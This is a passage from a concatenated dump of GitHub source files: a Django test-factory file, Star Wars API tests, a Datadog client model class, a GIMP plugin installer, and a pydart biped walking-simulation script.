CREATE_FIELDS['Aliquot']:\n if field in notused:\n continue\n column = \"{0}.{1}\".format('Aliquot', field)\n value = eval('instance.{0}'.format(field))\n row[column] = str(value)\n rows.append(row.copy())\n batch._write_row(instance, model='Aliquot')\n self.assertDictEqual(batch._row, row)\n self.assertCountEqual(batch.rows, rows)\n with self.assertRaises(AssertionError):\n instance.delete()\n\n def test_create_batch_create_instances(self):\n batch = LeukformSamplesFactory()\n\n # prefunction\n for model in MODELS_LIST:\n self.assertEqual(len(batch.instances[model]), 0)\n\n batch.create_batch()\n\n # check that the required number of instances were created\n for model in MODELS_LIST:\n self.assertEqual(len(batch.instances[model]), 1)\n\n # test extractions projects lists are being assigned correctly\n batch_projects = [p.pk for p in batch.projects]\n projects_string = \\\n batch.rows[0]['Workflow.projects_string'].split(\"|\")\n projects_string = [int(e) for e in projects_string]\n [self.assertIn(p, batch_projects) for p in projects_string]\n\n def test_csv_from_rows(self):\n self.maxDiff = None\n batch = LeukformSamplesFactory()\n batch.create_batch()\n path = batch.create_csv_from_rows()\n\n with open(path, 'r') as testcsv:\n rows = csv.DictReader(testcsv, delimiter=\",\")\n rows = list(rows)\n\n self.assertCountEqual(batch.rows, rows)\n os.remove(path)\n","repo_name":"komalsrathi/leukapp","sub_path":"leukapp/apps/leukforms/tests/test_factories.py","file_name":"test_factories.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12813500741","text":"from app.main import get_people\n\n\ndef test_get_people():\n response = get_people(\"R5-D4\")\n people = response[0].get(\"item\")\n assert people[\"name\"] == \"R5-D4\"\n\n\ndef test_get_recommendations_for_people():\n \"\"\"\n Characters in the same film\n \"\"\"\n response = get_people(\"luke\")\n\n recommendations = response[0].get(\"recommendations\")\n assert recommendations[0][\"name\"] == \"C-3PO\"\n assert recommendations[1][\"name\"] == \"R2-D2\"\n assert recommendations[2][\"name\"] == \"Darth Vader\"\n","repo_name":"alynnefs/star-wars-back","sub_path":"tests/tests_people.py","file_name":"tests_people.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"861564250","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom datadog_api_client.model_utils import (\n ModelNormal,\n cached_property,\n)\n\n\nif TYPE_CHECKING:\n from datadog_api_client.v2.model.fastly_account_update_request_data import FastlyAccountUpdateRequestData\n\n\nclass FastlyAccountUpdateRequest(ModelNormal):\n @cached_property\n def openapi_types(_):\n from datadog_api_client.v2.model.fastly_account_update_request_data import FastlyAccountUpdateRequestData\n\n return {\n \"data\": (FastlyAccountUpdateRequestData,),\n }\n\n attribute_map = {\n \"data\": \"data\",\n }\n\n def __init__(self_, data: FastlyAccountUpdateRequestData, **kwargs):\n \"\"\"\n Payload schema when updating a Fastly account.\n\n :param data: Data object for updating a Fastly account.\n :type data: FastlyAccountUpdateRequestData\n \"\"\"\n super().__init__(kwargs)\n\n self_.data = data\n","repo_name":"DataDog/datadog-api-client-python","sub_path":"src/datadog_api_client/v2/model/fastly_account_update_request.py","file_name":"fastly_account_update_request.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"2"} +{"seq_id":"36185729825","text":"import json\nimport os\nimport sys\n\nfrom gpi.web import get_package_info\n\n# FIXME: Add a sane default path for Windows.\nif sys.platform == 'darwin':\n default_config_dir = os.path.expanduser(\n '~/Library/Application Support/GIMP/2.8/'\n )\nelif sys.platform.startswith('linux'):\n default_config_dir = os.path.expanduser('~/.gimp-2.8/')\nelse:\n default_config_dir = os.path.expanduser('~/.gimp-2.8/')\n\ngimp_config_dir = os.environ.get(\n 'GIMP_CONFIG_DIR', default_config_dir)\n\ngpi_config_file = os.path.join(gimp_config_dir, '.gpi.json')\n\n\nclass OverlapException(Exception):\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\n\ndef is_non_zero_file(path):\n return True if os.path.isfile(\n path) and os.path.getsize(path) > 0 else False\n\n\ndef plugin_subdir(plugin_type):\n if plugin_type == 'scriptfu':\n return os.path.join(gimp_config_dir, 'scripts')\n else:\n return os.path.join(gimp_config_dir, 'plug-ins')\n\n\ndef install(tar, manifest=None):\n if manifest is None:\n manifest = json.load(tar.extractfile('gpi.json'))\n\n if not is_non_zero_file(gpi_config_file):\n index = {'files': {}, 'packages': {}}\n else:\n with open(gpi_config_file, 'r') as f:\n index = json.load(f)\n\n directory = plugin_subdir(manifest.get('type', 'python'))\n\n files = [t for t in tar if t.name.startswith(\"contents/\")]\n\n for t in files:\n t.name = t.name[9:] # contents/\n if t.name in index['files'].keys():\n # fail only if the overlap is not a directory\n if t.isfile():\n raise OverlapException(t.name)\n\n plugin_info = {\n 'version': manifest['version'],\n 'name': manifest['name'],\n 'files': [file.name for file in files],\n 'type': manifest.get('type', 'python')\n }\n index['packages'][manifest['identifier']] = plugin_info\n for f in plugin_info['files']:\n index['files'][f] = manifest['identifier']\n\n with open(gpi_config_file, 'w+') as f:\n f.write(json.dumps(index))\n\n tar.extractall(directory, members=files)\n\n\ndef uninstall(plugin_name):\n if not os.path.isfile(gpi_config_file):\n return False\n with open(gpi_config_file, 'r') as f:\n index = json.load(f)\n if plugin_name not in index['packages']:\n return False\n\n directory = plugin_subdir(index['packages'][plugin_name]['type'])\n # sorting by negative length means we remove files in a dir before removing\n # the directory\n index['packages'][plugin_name]['files'].sort(key=lambda x: -1*len(x))\n for file in index['packages'][plugin_name]['files']:\n full_path = os.path.join(directory, file)\n if os.path.isdir(full_path):\n try:\n os.rmdir(full_path)\n except OSError:\n # An OSError here generally means the directory is not empty.\n # This is generally due to plugins with conflicting\n # directories. This error is ignored because we need need to\n # keep the dir for other plugins.\n pass\n else:\n os.remove(full_path)\n\n for f in index['packages'][plugin_name]['files']:\n del index['files'][f]\n del index['packages'][plugin_name]\n with open(gpi_config_file, 'w') as f:\n f.write(json.dumps(index))\n\n return True\n\n\ndef info(plugin_name):\n \"\"\"Lists all installed packages registered with gpi.\n Always lists the package name and whether it is installed.\n If the package is installed the installed version is listed.\n If the package is not installed the available versions are listed.\n If there is a package description, print that too.\n \"\"\"\n # Note that we rely on the API giving us a dictionary with a 'releases' key\n # which holds a list of dictionaries, each containing a 'version' key.\n # We rely on the package in the GPI config file to have a 'version' key.\n\n # Handle the case where the config file doesn't exist. This may happen if\n # nothing has been installed before.\n if os.path.isfile(gpi_config_file):\n with open(gpi_config_file, 'r') as f:\n package_index = json.load(f)['packages']\n if plugin_name in package_index:\n return local_info(plugin_name, package_index[plugin_name])\n return remote_info(plugin_name)\n\n\ndef local_info(plugin_name, plugin_metadata):\n \"\"\"Return info about an installed package as a dict\"\"\"\n return dict(\n name=plugin_name,\n description=plugin_metadata.get('description'),\n version=plugin_metadata['version'],\n installed=True)\n\n\ndef remote_info(plugin_name):\n \"\"\"Return human readable info about a package which is not installed.\n Fetches info from the server.\n\n Will raise a PackageNotFound exception if the package doesn't exist\n locally or remotely.\"\"\"\n plugin_info = get_package_info(plugin_name)\n return dict(\n name=plugin_name,\n description=plugin_info.get('description'),\n versions_available=plugin_info['releases'],\n installed=False)\n\n\ndef currently_installed():\n if os.path.isfile(gpi_config_file):\n with open(gpi_config_file, 'r') as f:\n package_index = json.load(f)['packages']\n return [\n {'name': package_index[i]['name'], 'identifier': i, 'version':\n package_index[i]['version'], } for i in package_index]\n else:\n return []\n","repo_name":"tschuy/gpi","sub_path":"gpi/installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"32377206212","text":"from fltk import *\nimport copy\nimport os.path\nfrom cPickle import load\n# import time\nimport numpy as np\n\nimport sys\nif \"..\" not in sys.path:\n sys.path.append(\"..\")\n\nfrom PyCommon.modules.ArticulatedBody import hpBipedFeedback as hbf\n\nfrom PyCommon.modules.Math import mmMath as mm\nfrom PyCommon.modules.Math import ysFunctionGraph as yfg\nfrom PyCommon.modules.Renderer import ysRenderer as yr\n# from PyCommon.modules.Simulator import ysVpUtil as yvu\nfrom PyCommon.modules.GUI import ysSimpleViewer_ori as ysv\nfrom PyCommon.modules.GUI import ysMultiViewer as ymv\n# from PyCommon.modules.ArticulatedBody import ysControl as yct\n# from PyCommon.modules.ArticulatedBody import ysReferencePoints as yrp\nfrom PyCommon.modules.Motion import ysMotionAnalysis as yma\nfrom PyCommon.modules.Motion import ysBipedAnalysis as yba\nfrom PyCommon.modules.Motion import ysMotion as ym\nfrom PyCommon.modules.Motion import ysMotionBlend as ymb\nfrom PyCommon.modules.Motion import ysMotionExtend as ymt\n# from PyCommon.modules.Motion import ysSkeletonEdit as yhe\nfrom PyCommon.modules.Motion import mmAnalyticIK as aik\nfrom PyCommon.modules.Util import ysMatplotEx as ymp\nfrom PyCommon.modules.Resource import ysMotionLoader as yf\nfrom PyCommon.modules.Simulator import ysPhysConfig as ypc\n\nfrom PyCommon.modules.Simulator import hpDartLCPSimulator as hdls\nfrom PyCommon.modules.GUI import hpSimpleViewer as hsv\nfrom PyCommon.modules.Util import ysPythonEx as ype\n\nfrom PyCommon.modules import pydart2 as pydart\nfrom PyCommon.modules.Simulator import csDartModel as cpm\nfrom pdcontroller import PDController\n\nfrom PyCommon.modules.ArticulatedBody import hpFootIK as hfi\n\nimport math\n# from matplotlib import collections\n\nimport multiprocessing as mp\nimport cma\n\ncurrent_path = os.path.dirname(os.path.abspath(__file__))\n\n# MOTION_COLOR = (128,128,128)\n# CHARACTER_COLOR = (102,102,153)\nMOTION_COLOR = (213, 111, 162)\nCHARACTER_COLOR = (20, 166, 188)\n\nMAX_FRAME = 1500\n\nSEGMENT_FOOT = True\nSEGMENT_FOOT_MAG = .03\nSEGMENT_FOOT_RAD = SEGMENT_FOOT_MAG * .5\n\ndef buildMassMap():\n massMap = {}\n massMap = massMap.fromkeys(['Head', 'Head_Effector', 'Hips',\n 'LeftArm', 'LeftFoot', 'LeftForeArm', 'LeftHand', 'LeftHand_Effector',\n 'LeftLeg', 'LeftShoulder1', 'LeftUpLeg',\n 'RightArm', 'RightFoot', 'RightForeArm', 'RightHand', 'RightHand_Effector',\n 'RightLeg', 'RightShoulder', 'RightUpLeg',\n 'Spine', 'Spine1',\n 'RightFoot_foot_0_0', 'RightFoot_foot_0_1', 'RightFoot_foot_0_1_Effector',\n 'RightFoot_foot_1_0', 'RightFoot_foot_1_1', 'RightFoot_foot_1_1_Effector',\n 'RightFoot_foot_2_0', 'RightFoot_foot_2_1', 'RightFoot_foot_2_1_Effector',\n 'LeftFoot_foot_0_0', 'LeftFoot_foot_0_1', 'LeftFoot_foot_0_1_Effector',\n 'LeftFoot_foot_1_0', 'LeftFoot_foot_1_1', 'LeftFoot_foot_1_1_Effector',\n 'LeftFoot_foot_2_0', 'LeftFoot_foot_2_1', 'LeftFoot_foot_2_1_Effector',\n ], 0.)\n\n # torso : 10\n massMap['Hips'] += 2.\n massMap['Spine'] += 8.\n\n # head : 3\n massMap['Spine1'] += 3.\n\n # right upper arm : 2\n massMap['RightArm'] += 2.\n\n # left upper arm : 2\n massMap['LeftArm'] += 2.\n\n # right lower arm : 1\n massMap['RightForeArm'] = 1.\n # massMap['RightForeArm'] = 2.\n\n # left lower arm : 1\n massMap['LeftForeArm'] = 1.\n # massMap['LeftForeArm'] = 2.\n\n # right thigh : 7\n massMap['Hips'] += 2.\n massMap['RightUpLeg'] += 5.\n\n # left thigh : 7\n massMap['Hips'] += 2.\n massMap['LeftUpLeg'] += 5.\n\n # right shin : 5\n massMap['RightLeg'] += 5.\n\n # left shin : 5\n massMap['LeftLeg'] += 5.\n\n # right foot : 4\n massMap['RightFoot'] += 2.\n # massMap['RightFoot'] += .4\n\n # left foot : 4\n massMap['LeftFoot'] += 2.\n # massMap['LeftFoot'] += .4\n '''\n massMap['RightFoot_foot_0_0'] = .3\n massMap['RightFoot_foot_0_1'] = .3\n massMap['RightFoot_foot_1_0'] = .3\n massMap['RightFoot_foot_1_1'] = .3\n massMap['RightFoot_foot_2_0'] = .3\n massMap['RightFoot_foot_2_1'] = .3\n massMap['LeftFoot_foot_0_0'] = .3\n massMap['LeftFoot_foot_0_1'] = .3\n massMap['LeftFoot_foot_1_0'] = .3\n massMap['LeftFoot_foot_1_1'] = .3\n massMap['LeftFoot_foot_2_0'] = .3\n massMap['LeftFoot_foot_2_1'] = .3\n #'''\n\n massMap['RightFoot_foot_0_0'] = .1\n massMap['RightFoot_foot_0_1'] = .1\n massMap['RightFoot_foot_0_0_0'] = .1\n massMap['RightFoot_foot_0_1_0'] = .1\n massMap['RightFoot_foot_1_0'] = .1\n massMap['RightFoot_foot_1_1'] = .1\n massMap['RightFoot_foot_1_2'] = .1\n massMap['LeftFoot_foot_0_0'] = .1\n massMap['LeftFoot_foot_0_1'] = .1\n massMap['LeftFoot_foot_0_0_0'] = .1\n massMap['LeftFoot_foot_0_1_0'] = .1\n massMap['LeftFoot_foot_1_0'] = .1\n massMap['LeftFoot_foot_1_1'] = .1\n massMap['LeftFoot_foot_1_2'] = .1\n\n return massMap\n\n\ndef buildMcfg():\n massMap = buildMassMap()\n mcfg = ypc.ModelConfig()\n mcfg.defaultDensity = 1000.\n mcfg.defaultBoneRatio = .9\n\n totalMass = 0.\n for name in massMap:\n node = mcfg.addNode(name)\n node.mass = massMap[name]\n # totalMass += node.mass\n\n # width : x axis on body frame\n # height: y axis on body frame\n # length: z axis on body frame\n node = mcfg.getNode('Hips')\n node.length = .2\n node.width = .25\n\n node = mcfg.getNode('Spine1')\n node.length = .2\n node.offset = (0,0,0.1)\n\n node = mcfg.getNode('Spine')\n node.width = .22\n\n node = mcfg.getNode('RightFoot')\n node.length = .25\n # node.length = .27\n # node.offset = (0,0,0.01)\n node.width = .1\n node.geom = 'MyFoot1'\n\n node = mcfg.getNode('LeftFoot')\n node.length = .25\n # node.length = .27\n # node.offset = (0,0,0.01)\n node.width = .1\n node.geom = 'MyFoot1'\n\n def capsulize(node_name):\n node_capsule = mcfg.getNode(node_name)\n node_capsule.geom = 'MyFoot4'\n node_capsule.width = 0.01\n node_capsule.density = 200.\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0., math.pi/4., 0.])], ypc.CapsuleMaterial(1000., .02, .2))\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0., math.pi/4., 0.])], ypc.CapsuleMaterial(1000., .02, .1))\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0., 0., 0.])], ypc.CapsuleMaterial(1000., .01, -1))\n # node.addGeom('MyFoot4', None, ypc.CapsuleMaterial(1000., .02, .1))\n\n # capsulize('RightFoot')\n # capsulize('LeftFoot')\n\n if SEGMENT_FOOT:\n node = mcfg.getNode('RightFoot')\n node.density = 200.\n node.geom = 'MyFoot5'\n node.width = 0.01\n node.jointType = 'B'\n\n node = mcfg.getNode('LeftFoot')\n node.density = 200.\n node.geom = 'MyFoot5'\n node.width = 0.01\n node.jointType = 'B'\n\n # bird foot\n # capsulize('RightFoot_foot_0_0')\n # capsulize('RightFoot_foot_0_1')\n # capsulize('RightFoot_foot_1_0')\n # capsulize('RightFoot_foot_1_1')\n # capsulize('RightFoot_foot_2_0')\n # capsulize('RightFoot_foot_2_1')\n # capsulize('LeftFoot_foot_0_0')\n # capsulize('LeftFoot_foot_0_1')\n # capsulize('LeftFoot_foot_1_0')\n # capsulize('LeftFoot_foot_1_1')\n # capsulize('LeftFoot_foot_2_0')\n # capsulize('LeftFoot_foot_2_1')\n\n\n # human foot\n if SEGMENT_FOOT:\n footJointType = 'B'\n capsulDensity = 400.\n\n # RightFoot_foot_0_0 : outside metatarsals\n capsulize('RightFoot_foot_0_0')\n node = mcfg.getNode('RightFoot_foot_0_0')\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([-0.3, 0., 2.5*0.25]), mm.exp([0., -math.atan2(1.2, 2.5), 0.])],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2.5 + 2.*SEGMENT_FOOT_RAD))\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([-0.3-1.2, 0., 2.5*0.25]), mm.exp([0., -math.atan2(1.2, 2.5), 0.])],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2.5 + 2.*SEGMENT_FOOT_RAD))\n # node.addGeom('MyFoot4', [0.02*np.array([-1.2, 0., 0.]), mm.exp([0., 0., 0.])], ypc.CapsuleMaterial(1000., .01, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_0_0_0 : outside phalanges\n capsulize('RightFoot_foot_0_0_0')\n node = mcfg.getNode('RightFoot_foot_0_0_0')\n node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot4', [SEGMENT_FOOT_MAG*np.array([-1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_0_1 : inside metatarsals\n capsulize('RightFoot_foot_0_1')\n node = mcfg.getNode('RightFoot_foot_0_1')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity,SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_0_1_0 : inside phalanges\n capsulize('RightFoot_foot_0_1_0')\n node = mcfg.getNode('RightFoot_foot_0_1_0')\n node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot4', [SEGMENT_FOOT_MAG*np.array([1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_1_0 : center heel\n capsulize('RightFoot_foot_1_0')\n node = mcfg.getNode('RightFoot_foot_1_0')\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([0., 0., .7]), mm.exp([0.]*3)],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2. + SEGMENT_FOOT_RAD * 2.))\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(1000., .01, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_1_1 : inside heel\n capsulize('RightFoot_foot_1_1')\n node = mcfg.getNode('RightFoot_foot_1_1')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_1_2 : outside heel\n capsulize('RightFoot_foot_1_2')\n node = mcfg.getNode('RightFoot_foot_1_2')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n\n capsulize('LeftFoot_foot_0_0')\n node = mcfg.getNode('LeftFoot_foot_0_0')\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([0.3, 0., 2.5*0.25]), mm.exp([0., math.atan2(1.2, 2.5), 0.])],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2.5+2.*SEGMENT_FOOT_RAD))\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([0.3+1.2, 0., 2.5*0.25]), mm.exp([0., math.atan2(1.2, 2.5), 0.])],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2.5+2.*SEGMENT_FOOT_RAD))\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(1000., .01, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_0_0_0')\n node = mcfg.getNode('LeftFoot_foot_0_0_0')\n node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot4', [SEGMENT_FOOT_MAG*np.array([1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_0_1')\n node = mcfg.getNode('LeftFoot_foot_0_1')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([-1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_0_1_0')\n node = mcfg.getNode('LeftFoot_foot_0_1_0')\n node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot4', [SEGMENT_FOOT_MAG*np.array([-1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_1_0')\n node = mcfg.getNode('LeftFoot_foot_1_0')\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([0., 0., .7]), mm.exp([0.]*3)],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2.0+2.*SEGMENT_FOOT_RAD))\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(1000., .01, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_1_1')\n node = mcfg.getNode('LeftFoot_foot_1_1')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_1_2')\n node = mcfg.getNode('LeftFoot_foot_1_2')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n\n return mcfg\n\n\ndef walkings(params, isCma=True):\n \"\"\"\n\n :type params: list[float]\n :return:\n \"\"\"\n class ForceInfo:\n def __init__(self, startFrame, duration, force):\n self.startFrame = startFrame # frame\n self.duration = duration # sec\n self.force = force # Newton\n self.targetBody = None\n\n #===============================================================================\n # load motion\n #===============================================================================\n MULTI_VIEWER = False\n CAMERA_TRACKING = False\n TORQUE_PLOT = False\n NO_FOOT_SLIDING = True\n\n # global parameters\n # Kt = 50.\n Kt = 300.\n Dt = 2.*(Kt**.5)\n # Dt = Kt/900.\n Ks = 1000.\n Ds = 2.*(Ks**.5)\n mu = 1.\n # Dt = 0.\n\n # constants\n c_min_contact_vel = 100.\n # c_min_contact_vel = 2.\n c_min_contact_time = .7\n c_landing_duration = .2\n c_taking_duration = .3\n # c_swf_mid_offset = .02\n c_swf_mid_offset = .0\n c_locking_vel = .05\n\n c_swf_offset = .0\n # c_swf_offset = .01\n # c_swf_offset = .005\n K_stp_pos = 0.\n\n # c5 = .5; c6 = .01\n c5 = .5; c6 = .02\n # c5 = .5; c6 = .05\n # c5 = 1.; c6 = .05\n # c5 = .0; c6 = .0\n\n K_stb_vel = .1\n K_stb_pos = .1\n\n OLD_SWING_HEIGHT = False\n # OLD_SWING_HEIGHT = True\n # HIGHER_OFFSET = True\n HIGHER_OFFSET = False\n\n motionDir = current_path+'/ppmotion/'\n # motionDir = './ppmotion/'\n #\n ## K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = .3; K_swp_pos_cor = 0.\n # K_swp_vel_sag = .05; K_swp_vel_cor = .2; K_swp_pos_sag = .2; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .05\n # filename = 'wd2_WalkSameSame01.bvh'\n ## filename = 'wd2_WalkSameSame01_REPEATED.bvh'\n\n ## K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = .3; K_swp_pos_cor = 0.\n # K_swp_vel_sag = .05; K_swp_vel_cor = .25; K_swp_pos_sag = .5; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .05\n # filename = 'wd2_WalkForwardSlow01.bvh'\n ## filename = 'wd2_WalkForwardSlow01_REPEATED.bvh' # 3 frame diff\n\n # K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = 1.; K_swp_pos_cor = 0.\n # K_stp_pos = .6\n K_swp_vel_sag = .0; K_swp_vel_cor = .3; K_swp_pos_sag = 1.2; K_swp_pos_cor = .2\n # K_swp_vel_sag = .0; K_swp_vel_cor = 1.3; K_swp_pos_sag = 1.2; K_swp_pos_cor = 1.\n K_swp_pos_sag_faster = .05\n # filename = 'wd2_WalkForwardNormal00.bvh'\n filename = 'wd2_WalkForwardNormal00_REPEATED.bvh'\n if SEGMENT_FOOT:\n filename = 'segfoot_'+filename\n\n ## K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = .3; K_swp_pos_cor = 0.\n ## K_stp_pos = 0.\n # K_swp_vel_sag = .05; K_swp_vel_cor = .2; K_swp_pos_sag = .3; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .05\n ## filename = 'wd2_WalkHandWav00.bvh'\n # filename = 'wd2_WalkHandWav00_REPEATED.bvh'\n\n # mu = 2.\n ## K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = .3; K_swp_pos_cor = 0.\n ## K_stp_pos = 0.\n # K_swp_vel_sag = .0; K_swp_vel_cor = .3; K_swp_pos_sag = .2; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .0\n ## filename = 'wd2_WalkAzuma01.bvh'\n # filename = 'wd2_WalkAzuma01_REPEATED.bvh' # 2 frame diff\n\n ## K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = 1.; K_swp_pos_cor = 0.\n ## K_stp_pos = 0.\n # K_swp_vel_sag = .0; K_swp_vel_cor = .3; K_swp_pos_sag = .2; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .05\n ## filename = 'wd2_WalkSoldier00.bvh' # K_swp_pos_sag = .0\n # filename = 'wd2_WalkSoldier00_REPEATED.bvh'\n\n # mu = 2.\n # # K_swp_vel_sag = .2; K_swp_vel_cor = .4; K_swp_pos_sag = .5;K_swp_pos_cor = 0.\n # # K_stp_pos = 0.\n # K_swp_vel_sag = .05; K_swp_vel_cor = .3; K_swp_pos_sag = .5; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .05\n # # filename = 'wd2_WalkForwardVFast00.bvh'\n # filename = 'wd2_WalkForwardVFast00_REPEATED.bvh'\n\n ## K_swp_vel_sag = .0; K_swp_vel_cor = .4; K_swp_pos_sag = .04; K_swp_pos_cor = .1\n ## K_swp_pos_sag_faster = .02\n ## K_stb_vel = .2\n # K_swp_vel_sag = .1; K_swp_vel_cor = .3; K_swp_pos_sag = 1.; K_swp_pos_cor = .3\n # K_swp_pos_sag_faster = .0\n # K_stb_vel = .3\n ## filename = 'wd2_WalkBackward00.bvh'\n # filename = 'wd2_WalkBackward00_REPEATED.bvh'\n\n\n # parameters\n if params is not None:\n _params = np.around(params, decimals=3)\n Ks = 1000.\n Ds = 2.*(Ks**.5)\n c_min_contact_vel = 100.\n # c_min_contact_vel = 2.\n c_min_contact_time = .7\n c_landing_duration = .2\n c_taking_duration = .3\n c_swf_mid_offset = .02\n # c_swf_mid_offset = .0\n c_locking_vel = .05\n\n c_swf_offset = .0\n # c_swf_offset = .01\n # c_swf_offset = .005\n K_stp_pos = _params[0]*_params[0]\n c5 = _params[1]*_params[1]\n c6 = _params[2]*_params[2]\n K_stb_vel = _params[3]*_params[3]\n K_stb_pos = _params[4]*_params[4]\n K_swp_vel_sag = _params[5]*_params[5]\n K_swp_vel_cor = _params[6]*_params[6]\n K_swp_pos_sag = _params[7]*_params[7]\n K_swp_pos_cor = _params[8]*_params[8]\n K_swp_pos_sag_faster = _params[9]*_params[9]\n\n # motion\n bvh = yf.readBvhFileAsBvh(motionDir+filename)\n\n if SEGMENT_FOOT:\n # partBvhFilePath = '../PyCommon/modules/samples/simpleJump_long_test2.bvh'\n partBvhFilePath = current_path+'/../PyCommon/modules/samples/simpleJump_long_test2.bvh'\n partBvh = yf.readBvhFileAsBvh(partBvhFilePath)\n bvh.replaceJointFromBvh('RightFoot', partBvh, SEGMENT_FOOT_MAG)\n partBvh = yf.readBvhFileAsBvh(partBvhFilePath)\n partBvh.mirror('YZ')\n bvh.replaceJointFromBvh('LeftFoot', partBvh, SEGMENT_FOOT_MAG)\n\n motion_ori = bvh.toJointMotion(1., False)\n\n # motion_ori = yf.readBvhFile(motionDir+filename)\n frameTime = 1/motion_ori.fps\n\n if 'REPEATED' in 